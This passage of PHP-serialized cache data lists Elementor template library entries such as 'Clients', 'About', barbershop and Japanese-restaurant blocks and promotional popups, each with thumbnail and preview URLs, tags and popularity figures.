Shop\",\"Barbershop\",\"footer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:622;s:11:\"trend_index\";i:405;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:417;a:14:{s:2:\"id\";i:5290;s:5:\"title\";s:9:\"Clients 3\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/clients_black_2.png\";s:12:\"tmpl_created\";i:1520443480;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/clients-3-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:518;s:11:\"trend_index\";i:565;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:418;a:14:{s:2:\"id\";i:13528;s:5:\"title\";s:22:\"Barbershop &#8211; 404\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/05/404-Page.jpg\";s:12:\"tmpl_created\";i:1589893152;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/barbershop-404/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:34:\"[\"404\",\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:727;s:11:\"trend_index\";i:675;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:419;a:14:{s:2:\"id\";i:5298;s:5:\"title\";s:10:\"Clients 15\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/clients_white_3.png\";s:12:\"tmpl_created\";i:1520443482;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/clients-15/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:437;s:11:\"trend_index\";i:506;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:420;a:14:{s:2:\"id\";i:9836;s:5:\"title\";s:21:\"Classic | Login | Pop\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/01/login_b_small.png\";s:12:\"tmpl_created\";i:1547835635;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/popups/classic-login/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:584;s:11:\"trend_index\";i:552;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:421;a:14:{s:2:\"id\";i:13518;s:5:\"title\";s:26:\"Barbershop &#8211; Archive\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Blog-Page.jpg\";s:12:\"tmpl_created\";i:1589893157;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/barbershop-archive/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:717;s:11:\"trend_index\";i:649;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:422;a:14:{s:2:\"id\";i:5306;s:5:\"title\";s:10:\"Clients 10\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/clients_black_3.png\";s:12:\"tmpl_created\";i:1520443484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/clients-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:605;s:11:\"trend_index\";i:677;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:423;a:14:{s:2:\"id\";i:9847;s:5:\"title\";s:25:\"Fly In | Promotion | Lego\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2019/01/fly_in_promotion_tro.png\";s:12:\"tmpl_created\";i:1547836956;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/popups/fly-in-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:686;s:11:\"trend_index\";i:692;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:424;a:14:{s:2:\"id\";i:5315;s:5:\"title\";s:10:\"Clients 12\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_4-1.png\";s:12:\"tmpl_created\";i:1520443486;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/clients-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:485;s:11:\"trend_index\";i:568;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:425;a:14:{s:2:\"id\";i:9858;s:5:\"title\";s:27:\"Slide In | Promotion | Wine\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2019/01/slide-in_promotion_wine_small.png\";s:12:\"tmpl_created\";i:1547837100;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/slide-in-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:712;s:11:\"trend_index\";i:0;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:426;a:14:{s:2:\"id\";i:5324;s:5:\"title\";s:9:\"Clients 8\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_5-1.png\";s:12:\"tmpl_created\";i:1520443488;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/clients-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:511;s:11:\"trend_index\";i:603;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:427;a:14:{s:2:\"id\";i:5333;s:5:\"title\";s:10:\"Clients 13\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_6.png\";s:12:\"tmpl_created\";i:1520443489;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/clients-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:238;s:11:\"trend_index\";i:324;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:428;a:14:{s:2:\"id\";i:5341;s:5:\"title\";s:10:\"Clients 11\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/clients_black_4.png\";s:12:\"tmpl_created\";i:1520443491;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/clients-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:566;s:11:\"trend_index\";i:646;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:429;a:14:{s:2:\"id\";i:5349;s:5:\"title\";s:9:\"Clients 7\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_7.png\";s:12:\"tmpl_created\";i:1520443493;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/clients-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:243;s:11:\"trend_index\";i:261;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:430;a:14:{s:2:\"id\";i:13538;s:5:\"title\";s:32:\"Fly-In | Newsletter | Barbershop\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/05/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1589893364;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/fly-in-newsletter-barbershop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:701;s:11:\"trend_index\";i:551;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:431;a:14:{s:2:\"id\";i:5357;s:5:\"title\";s:9:\"Clients 2\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/clients_black_7.png\";s:12:\"tmpl_created\";i:1520443495;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/clients-2-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:330;s:11:\"trend_index\";i:320;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:432;a:14:{s:2:\"id\";i:5368;s:5:\"title\";s:9:\"Clients 9\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_8.png\";s:12:\"tmpl_created\";i:1520443497;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/clients-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:247;s:11:\"trend_index\";i:273;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:433;a:14:{s:2:\"id\";i:5381;s:5:\"title\";s:10:\"Clients 16\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_9.png\";s:12:\"tmpl_created\";i:1520443499;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/clients-16/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:186;s:11:\"trend_index\";i:264;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:434;a:14:{s:2:\"id\";i:5389;s:5:\"title\";s:10:\"Clients 14\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_black_9.png\";s:12:\"tmpl_created\";i:1520443501;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/clients-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:385;s:11:\"trend_index\";i:420;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:435;a:14:{s:2:\"id\";i:9944;s:5:\"title\";s:33:\"Slide In | Promotion | Headphones\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2019/01/slidein_head_small.png\";s:12:\"tmpl_created\";i:1547841939;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/slide-in-promotion-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:689;s:11:\"trend_index\";i:652;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:436;a:14:{s:2:\"id\";i:5397;s:5:\"title\";s:8:\"About 11\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1.png\";s:12:\"tmpl_created\";i:1520443503;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:154;s:11:\"trend_index\";i:151;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:437;a:14:{s:2:\"id\";i:9955;s:5:\"title\";s:14:\"Fly In | Login\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2019/01/flyin_login_lock_small.png\";s:12:\"tmpl_created\";i:1547842065;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/popups/fly-in-login/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:524;s:11:\"trend_index\";i:522;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:438;a:14:{s:2:\"id\";i:5405;s:5:\"title\";s:8:\"About 12\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1.png\";s:12:\"tmpl_created\";i:1520443505;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:224;s:11:\"trend_index\";i:348;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:439;a:14:{s:2:\"id\";i:9965;s:5:\"title\";s:30:\"Classic | Register | Subscribe\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2019/01/classic_moon_small.png\";s:12:\"tmpl_created\";i:1547842174;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/classic-register-subscribe-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:539;s:11:\"trend_index\";i:606;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:440;a:14:{s:2:\"id\";i:5413;s:5:\"title\";s:8:\"About 21\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2.png\";s:12:\"tmpl_created\";i:1520443507;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-21/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:92;s:11:\"trend_index\";i:38;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:441;a:14:{s:2:\"id\";i:14058;s:5:\"title\";s:36:\"Japanese restaurant &#8211; 404 page\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/06/404-Page.jpg\";s:12:\"tmpl_created\";i:1592290211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/japanese-restaurant-404-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:38:\"[\"404\",\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:721;s:11:\"trend_index\";i:512;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:442;a:14:{s:2:\"id\";i:5421;s:5:\"title\";s:8:\"About 13\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_3.png\";s:12:\"tmpl_created\";i:1520443509;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:226;s:11:\"trend_index\";i:247;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:443;a:14:{s:2:\"id\";i:14050;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1592290247;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/japanese-restaurant-footer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:41:\"[\"Food\",\"footer\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:522;s:11:\"trend_index\";i:147;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:444;a:14:{s:2:\"id\";i:5429;s:5:\"title\";s:8:\"About 16\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_4.png\";s:12:\"tmpl_created\";i:1520443510;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-16/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:74;s:11:\"trend_index\";i:56;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:445;a:14:{s:2:\"id\";i:9995;s:5:\"title\";s:27:\"Slide In | Sale | Christmas\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2019/01/slidein_christmas_small.png\";s:12:\"tmpl_created\";i:1547844802;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/popups/slide-in-sale-christmas/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:719;s:11:\"trend_index\";i:693;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:446;a:14:{s:2:\"id\";i:14042;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Header\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2020/06/japanese-restaurant-header.jpg\";s:12:\"tmpl_created\";i:1592290277;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/japanese-restaurant-header/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:41:\"[\"Food\",\"header\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:559;s:11:\"trend_index\";i:196;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:447;a:14:{s:2:\"id\";i:5438;s:5:\"title\";s:7:\"About 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_4.png\";s:12:\"tmpl_created\";i:1520443512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:182;s:11:\"trend_index\";i:148;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:448;a:14:{s:2:\"id\";i:5447;s:5:\"title\";s:7:\"About 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_5.png\";s:12:\"tmpl_created\";i:1520443514;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-3-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:54;s:11:\"trend_index\";i:47;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:449;a:14:{s:2:\"id\";i:10016;s:5:\"title\";s:16:\"Hello Bar | Sale\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2019/01/Hello-Bar_Promotion_bag_small.png\";s:12:\"tmpl_created\";i:1547845062;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/hello-bar-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:726;s:11:\"trend_index\";i:0;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:450;a:14:{s:2:\"id\";i:14067;s:5:\"title\";s:37:\"Slide In | Japanese restaurant | Menu\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Menu-Pop-Up-Small.jpg\";s:12:\"tmpl_created\";i:1592290352;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-japanese-restaurant-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:675;s:11:\"trend_index\";i:476;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:451;a:14:{s:2:\"id\";i:5455;s:5:\"title\";s:8:\"About 20\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_6.png\";s:12:\"tmpl_created\";i:1520443516;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-20/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:137;s:11:\"trend_index\";i:169;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:452;a:14:{s:2:\"id\";i:10026;s:5:\"title\";s:46:\"Classic | Register | Subscribe | Gym | Fitness\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2019/01/classic_register_small.png\";s:12:\"tmpl_created\";i:1547845205;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/classic-register-subscribe-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:556;s:11:\"trend_index\";i:620;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:453;a:14:{s:2:\"id\";i:5464;s:5:\"title\";s:8:\"About 17\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_6.png\";s:12:\"tmpl_created\";i:1520443518;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-17/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:229;s:11:\"trend_index\";i:249;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:454;a:14:{s:2:\"id\";i:10036;s:5:\"title\";s:43:\"Full Screen | Sale | Promotion | Headphones\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2019/01/full_sale_head_small.png\";s:12:\"tmpl_created\";i:1547845409;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/full-screen-sale-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:574;s:11:\"trend_index\";i:467;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:455;a:14:{s:2:\"id\";i:14111;s:5:\"title\";s:36:\"Classic | Japanese restaurant | Sale\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1592300400;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-japanese-restaurant-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:715;s:11:\"trend_index\";i:587;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:456;a:14:{s:2:\"id\";i:5472;s:5:\"title\";s:7:\"About 